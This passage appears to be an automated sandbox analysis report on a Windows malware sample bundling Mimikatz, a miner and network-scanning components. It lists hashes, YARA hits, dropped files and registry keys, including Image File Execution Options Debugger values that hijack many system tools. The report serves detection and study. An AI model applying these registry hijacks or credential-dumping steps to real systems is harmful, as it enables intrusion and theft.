Analysis
-
max time kernel
149s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
08-09-2024 09:05
Behavioral task
behavioral1
Sample
202409084789384a63f292ff354279838552f4f9hacktoolsicedidmimikatz.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
202409084789384a63f292ff354279838552f4f9hacktoolsicedidmimikatz.exe
Resource
win10v2004-20240802-en
General
-
Target
202409084789384a63f292ff354279838552f4f9hacktoolsicedidmimikatz.exe
-
Size
7.3MB
-
MD5
4789384a63f292ff354279838552f4f9
-
SHA1
806a23fcc6b57053d91dc7ffc4f469b4fd1a2e68
-
SHA256
ff0399e532871b1905c7babb313692759b8bcb22050ee79e4e9bb568ac284925
-
SHA512
06c5382440af5561374967fcef671743ded8122116aaf83dff02b512d35e253cf2ae2624e184177e80e283304776f211c5bcf02343ad6daa62af2a43ea9badf4
-
SSDEEP
196608:7po1mknGzwHdOgEPHd9BbX/nivPlTXTYe:agjz0E57/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2240 created 2268 2240 vmgkttu.exe 39 -
Contacts a large (16946) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 10 IoCs
resource yara_rule behavioral2/memory/4544-178-0x00007FF738D70000-0x00007FF738E90000-memory.dmp xmrig behavioral2/memory/4544-182-0x00007FF738D70000-0x00007FF738E90000-memory.dmp xmrig behavioral2/memory/4544-200-0x00007FF738D70000-0x00007FF738E90000-memory.dmp xmrig behavioral2/memory/4544-213-0x00007FF738D70000-0x00007FF738E90000-memory.dmp xmrig behavioral2/memory/4544-222-0x00007FF738D70000-0x00007FF738E90000-memory.dmp xmrig behavioral2/memory/4544-235-0x00007FF738D70000-0x00007FF738E90000-memory.dmp xmrig behavioral2/memory/4544-236-0x00007FF738D70000-0x00007FF738E90000-memory.dmp xmrig behavioral2/memory/4544-244-0x00007FF738D70000-0x00007FF738E90000-memory.dmp xmrig behavioral2/memory/4544-245-0x00007FF738D70000-0x00007FF738E90000-memory.dmp xmrig behavioral2/memory/4544-246-0x00007FF738D70000-0x00007FF738E90000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/4752-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/4752-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x0007000000023487-6.dat mimikatz behavioral2/memory/736-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/4856-138-0x00007FF6FBAA0000-0x00007FF6FBB8E000-memory.dmp mimikatz -
Drops file in Drivers directory 2 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts vmgkttu.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe vmgkttu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vmgkttu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe vmgkttu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe vmgkttu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe vmgkttu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe vmgkttu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe vmgkttu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vmgkttu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe vmgkttu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe vmgkttu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vmgkttu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vmgkttu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vmgkttu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe vmgkttu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vmgkttu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vmgkttu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vmgkttu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vmgkttu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vmgkttu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vmgkttu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vmgkttu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe vmgkttu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vmgkttu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe vmgkttu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vmgkttu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe vmgkttu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe vmgkttu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vmgkttu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe vmgkttu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vmgkttu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe vmgkttu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vmgkttu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe vmgkttu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vmgkttu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe vmgkttu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe vmgkttu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vmgkttu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe vmgkttu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vmgkttu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe vmgkttu.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 4176 netsh.exe 5080 netsh.exe -
Executes dropped EXE 26 IoCs
pid Process 736 vmgkttu.exe 2240 vmgkttu.exe 1740 wpcap.exe 1172 bqbingtiu.exe 4856 vfshost.exe 4752 uuinytuyr.exe 4156 xohudmc.exe 3708 ewqkwq.exe 4544 byibml.exe 4444 uuinytuyr.exe 3044 uuinytuyr.exe 692 uuinytuyr.exe 4868 uuinytuyr.exe 4724 uuinytuyr.exe 628 uuinytuyr.exe 216 uuinytuyr.exe 3532 uuinytuyr.exe 4572 uuinytuyr.exe 4624 uuinytuyr.exe 3276 uuinytuyr.exe 5076 uuinytuyr.exe 220 uuinytuyr.exe 2236 vmgkttu.exe 4352 uuinytuyr.exe 1388 uuinytuyr.exe 1360 lbkbubrfy.exe -
Loads dropped DLL 12 IoCs
pid Process 1740 wpcap.exe 1740 wpcap.exe 1740 wpcap.exe 1740 wpcap.exe 1740 wpcap.exe 1740 wpcap.exe 1740 wpcap.exe 1740 wpcap.exe 1740 wpcap.exe 1172 bqbingtiu.exe 1172 bqbingtiu.exe 1172 bqbingtiu.exe -
resource yara_rule behavioral2/files/0x00070000000234ca-134.dat upx behavioral2/memory/4856-136-0x00007FF6FBAA0000-0x00007FF6FBB8E000-memory.dmp upx behavioral2/memory/4856-138-0x00007FF6FBAA0000-0x00007FF6FBB8E000-memory.dmp upx behavioral2/files/0x00070000000234d5-141.dat upx behavioral2/memory/4752-142-0x00007FF7A5700000-0x00007FF7A575B000-memory.dmp upx behavioral2/memory/4752-150-0x00007FF7A5700000-0x00007FF7A575B000-memory.dmp upx behavioral2/files/0x00070000000234d2-164.dat upx behavioral2/memory/4544-165-0x00007FF738D70000-0x00007FF738E90000-memory.dmp upx behavioral2/memory/4444-171-0x00007FF7A5700000-0x00007FF7A575B000-memory.dmp upx behavioral2/memory/3044-175-0x00007FF7A5700000-0x00007FF7A575B000-memory.dmp upx behavioral2/memory/4544-178-0x00007FF738D70000-0x00007FF738E90000-memory.dmp upx behavioral2/memory/692-180-0x00007FF7A5700000-0x00007FF7A575B000-memory.dmp upx behavioral2/memory/4544-182-0x00007FF738D70000-0x00007FF738E90000-memory.dmp upx behavioral2/memory/4868-186-0x00007FF7A5700000-0x00007FF7A575B000-memory.dmp upx behavioral2/memory/4724-190-0x00007FF7A5700000-0x00007FF7A575B000-memory.dmp upx behavioral2/memory/628-194-0x00007FF7A5700000-0x00007FF7A575B000-memory.dmp upx behavioral2/memory/216-198-0x00007FF7A5700000-0x00007FF7A575B000-memory.dmp upx behavioral2/memory/4544-200-0x00007FF738D70000-0x00007FF738E90000-memory.dmp upx behavioral2/memory/3532-203-0x00007FF7A5700000-0x00007FF7A575B000-memory.dmp upx behavioral2/memory/4572-207-0x00007FF7A5700000-0x00007FF7A575B000-memory.dmp upx behavioral2/memory/4624-211-0x00007FF7A5700000-0x00007FF7A575B000-memory.dmp upx behavioral2/memory/4544-213-0x00007FF738D70000-0x00007FF738E90000-memory.dmp upx behavioral2/memory/3276-216-0x00007FF7A5700000-0x00007FF7A575B000-memory.dmp upx behavioral2/memory/5076-220-0x00007FF7A5700000-0x00007FF7A575B000-memory.dmp upx behavioral2/memory/4544-222-0x00007FF738D70000-0x00007FF738E90000-memory.dmp upx behavioral2/memory/220-225-0x00007FF7A5700000-0x00007FF7A575B000-memory.dmp upx behavioral2/memory/4352-232-0x00007FF7A5700000-0x00007FF7A575B000-memory.dmp upx behavioral2/memory/1388-234-0x00007FF7A5700000-0x00007FF7A575B000-memory.dmp upx behavioral2/memory/4544-235-0x00007FF738D70000-0x00007FF738E90000-memory.dmp upx behavioral2/memory/4544-236-0x00007FF738D70000-0x00007FF738E90000-memory.dmp upx behavioral2/memory/4544-244-0x00007FF738D70000-0x00007FF738E90000-memory.dmp upx behavioral2/memory/4544-245-0x00007FF738D70000-0x00007FF738E90000-memory.dmp upx behavioral2/memory/4544-246-0x00007FF738D70000-0x00007FF738E90000-memory.dmp upx -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 50 ifconfig.me 49 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 16 IoCs
description ioc Process File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\SysWOW64\ewqkwq.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE vmgkttu.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 vmgkttu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache vmgkttu.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\ewqkwq.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDAB91A53CE5876D153BF0B6B3BA7DCE vmgkttu.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies vmgkttu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft vmgkttu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData vmgkttu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content vmgkttu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDAB91A53CE5876D153BF0B6B3BA7DCE vmgkttu.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 59 IoCs
description ioc Process File created C:\Windows\nntufbicv\uibkahlsb\Packet.dll vmgkttu.exe File created C:\Windows\nntufbicv\upbdrjv\swrpwe.exe vmgkttu.exe File opened for modification C:\Windows\nntufbicv\Corporate\log.txt cmd.exe File created C:\Windows\nntufbicv\UnattendGC\vimpcsvc.xml vmgkttu.exe File created C:\Windows\nntufbicv\UnattendGC\schoedcl.xml vmgkttu.exe File created C:\Windows\kunylkua\svschost.xml vmgkttu.exe File opened for modification C:\Windows\kunylkua\docmicfg.xml vmgkttu.exe File created C:\Windows\nntufbicv\uibkahlsb\scan.bat vmgkttu.exe File created C:\Windows\nntufbicv\UnattendGC\svschost.xml vmgkttu.exe File created C:\Windows\nntufbicv\UnattendGC\specials\spoolsrv.xml vmgkttu.exe File created C:\Windows\kunylkua\vimpcsvc.xml vmgkttu.exe File created C:\Windows\nntufbicv\UnattendGC\specials\svschost.xml vmgkttu.exe File created C:\Windows\nntufbicv\UnattendGC\specials\crli-0.dll vmgkttu.exe File created C:\Windows\nntufbicv\UnattendGC\specials\ucl.dll vmgkttu.exe File created C:\Windows\nntufbicv\UnattendGC\docmicfg.xml vmgkttu.exe File opened for modification C:\Windows\kunylkua\spoolsrv.xml vmgkttu.exe File created C:\Windows\nntufbicv\UnattendGC\Shellcode.ini vmgkttu.exe File created C:\Windows\nntufbicv\Corporate\mimilib.dll vmgkttu.exe File created C:\Windows\nntufbicv\UnattendGC\specials\tucl-1.dll vmgkttu.exe File created C:\Windows\nntufbicv\UnattendGC\spoolsrv.xml vmgkttu.exe File created C:\Windows\nntufbicv\uibkahlsb\wpcap.exe vmgkttu.exe File created C:\Windows\nntufbicv\uibkahlsb\bqbingtiu.exe vmgkttu.exe File created C:\Windows\nntufbicv\UnattendGC\specials\xdvl-0.dll vmgkttu.exe File created C:\Windows\nntufbicv\UnattendGC\specials\svschost.exe vmgkttu.exe File created C:\Windows\nntufbicv\Corporate\vfshost.exe vmgkttu.exe File created C:\Windows\nntufbicv\uibkahlsb\wpcap.dll vmgkttu.exe File created C:\Windows\nntufbicv\UnattendGC\specials\ssleay32.dll vmgkttu.exe File created C:\Windows\nntufbicv\UnattendGC\specials\trfo-2.dll vmgkttu.exe File created C:\Windows\nntufbicv\UnattendGC\specials\docmicfg.exe vmgkttu.exe File created C:\Windows\nntufbicv\UnattendGC\specials\schoedcl.exe vmgkttu.exe File created C:\Windows\nntufbicv\UnattendGC\specials\docmicfg.xml vmgkttu.exe File created C:\Windows\kunylkua\spoolsrv.xml vmgkttu.exe File created C:\Windows\nntufbicv\UnattendGC\specials\tibe-2.dll vmgkttu.exe File created C:\Windows\nntufbicv\UnattendGC\specials\trch-1.dll vmgkttu.exe File created C:\Windows\nntufbicv\UnattendGC\specials\zlib1.dll vmgkttu.exe File created C:\Windows\nntufbicv\UnattendGC\specials\spoolsrv.exe vmgkttu.exe File opened for modification C:\Windows\kunylkua\vimpcsvc.xml vmgkttu.exe File created C:\Windows\nntufbicv\UnattendGC\specials\posh-0.dll vmgkttu.exe File created C:\Windows\nntufbicv\UnattendGC\specials\vimpcsvc.exe vmgkttu.exe File created C:\Windows\nntufbicv\UnattendGC\specials\vimpcsvc.xml vmgkttu.exe File opened for modification C:\Windows\kunylkua\schoedcl.xml vmgkttu.exe File created C:\Windows\nntufbicv\UnattendGC\AppCapture32.dll vmgkttu.exe File created C:\Windows\nntufbicv\uibkahlsb\ip.txt vmgkttu.exe File opened for modification C:\Windows\kunylkua\vmgkttu.exe 202409084789384a63f292ff354279838552f4f9hacktoolsicedidmimikatz.exe File created C:\Windows\nntufbicv\UnattendGC\specials\coli-0.dll vmgkttu.exe File created C:\Windows\kunylkua\docmicfg.xml vmgkttu.exe File opened for modification C:\Windows\kunylkua\svschost.xml vmgkttu.exe File created C:\Windows\nntufbicv\Corporate\mimidrv.sys vmgkttu.exe File created C:\Windows\ime\vmgkttu.exe vmgkttu.exe File opened for modification C:\Windows\nntufbicv\uibkahlsb\Packet.dll vmgkttu.exe File created C:\Windows\nntufbicv\UnattendGC\specials\libeay32.dll vmgkttu.exe File created C:\Windows\nntufbicv\UnattendGC\specials\exma-1.dll vmgkttu.exe File created C:\Windows\nntufbicv\UnattendGC\specials\libxml2.dll vmgkttu.exe File created C:\Windows\nntufbicv\UnattendGC\specials\schoedcl.xml vmgkttu.exe File created C:\Windows\kunylkua\vmgkttu.exe 202409084789384a63f292ff354279838552f4f9hacktoolsicedidmimikatz.exe File created C:\Windows\nntufbicv\UnattendGC\AppCapture64.dll vmgkttu.exe File created C:\Windows\nntufbicv\uibkahlsb\lbkbubrfy.exe vmgkttu.exe File created C:\Windows\nntufbicv\UnattendGC\specials\cnli-1.dll vmgkttu.exe File created C:\Windows\kunylkua\schoedcl.xml vmgkttu.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1896 sc.exe 1984 sc.exe 3956 sc.exe 2984 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vmgkttu.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened 